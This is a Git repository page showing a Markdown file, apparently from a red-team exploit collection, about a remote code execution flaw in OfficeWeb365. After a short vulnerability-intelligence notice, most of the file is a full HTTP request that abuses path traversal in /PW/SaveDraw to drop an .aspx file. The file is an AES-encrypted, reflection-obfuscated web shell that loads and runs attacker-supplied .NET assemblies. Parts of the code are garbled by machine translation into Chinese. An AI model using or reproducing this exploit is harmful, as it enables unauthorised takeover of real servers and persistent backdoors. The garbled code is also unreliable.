admin/2023Hvv
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
2023Hvv/OfficeWeb365 远程代码执行漏洞.md
ibaiw 55a3531280 add
2023-08-15 14:36:32 +08:00

51 lines
3.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

【消息详情】360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息经漏洞云复核确认为【真实】漏洞漏洞影响【未知】版本该漏洞标准化POC已经上传漏洞云情报平台平台编号360LDYLD-2023-00002453情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息经漏洞云复核确认为【真实】漏洞漏洞影响【未知】版本该漏洞标准化POC已经升级漏洞云情报平台平台编号 360LDYLD-2023-00002453
\# 详细
```
POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
主持人xxx
用户代理Mozilla/5.0MacintoshIntel Mac OS X 10_15_7AppleWebKit/537.36KHTML如 GeckoChrome/88.0.434.18 Safari/537.36
内容长度2265
内容类型application/x-www-form-urlencoded
接受编码gzip、deflate
连接:关闭
数据:image/png;base64,01s34567890123456789y12345678901234567m91<%@ 页面语言="C#" %>
<%@Import 命名空间="System.Reflection" %>
<脚本运行=“服务器”>
私有字节[]解密(字节[]数据)
{
字符串键=“e45e329feb5d925b”
数据 = Convert.FromBase64String(System.Text.Encoding.UTF8.GetString(data));
System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
aes.Mode = System.Security.Cryptography.CipherMode.ECB;
aes.Key = Encoding.UTF8.GetBytes(key);
aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
return aes.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
}
私有字节[]加密(字节[]数据)
{
字符串键=“e45e329feb5d925b”
System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();
aes.Mode = System.Security.Cryptography.CipherMode.ECB;
aes.Key = Encoding.UTF8.GetBytes(key);
aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
返回 System.Text.Encoding.UTF8.GetBytes(Convert.ToBase64String(aes.CreateEncryptor().TransformFinalBlock(data, 0, data.Length)));
}
</脚本>
<%
//byte[] c=Request.BinaryRead(Request.ContentLength);Assembly.Load(Decrypt(c)).CreateInstance("U").Equals(this);
byte[] c=Request.BinaryRead(Request.ContentLength);
string asname=System.Text.Encoding.ASCII.GetString(new byte[] {0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f, 0x6e,0x2e,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79});
类型程序集=Type.GetType(asname);
MethodInfo load = assembly.GetMethod("Load",new Type[] {new byte[0].GetType()});
对象 obj=load.Invoke(null, new object[]{Decrypt(c)});
MethodInfo create = assembly.GetMethod("CreateInstance",new Type[] { "".GetType()});
字符串名称 = System.Text.Encoding.ASCII.GetString(new byte[] { 0x55 });
object pay=create.Invoke(obj,new object[] { name });
pay.Equals(this);%>>---
```
Reference in New Issue View Git Blame Copy Permalink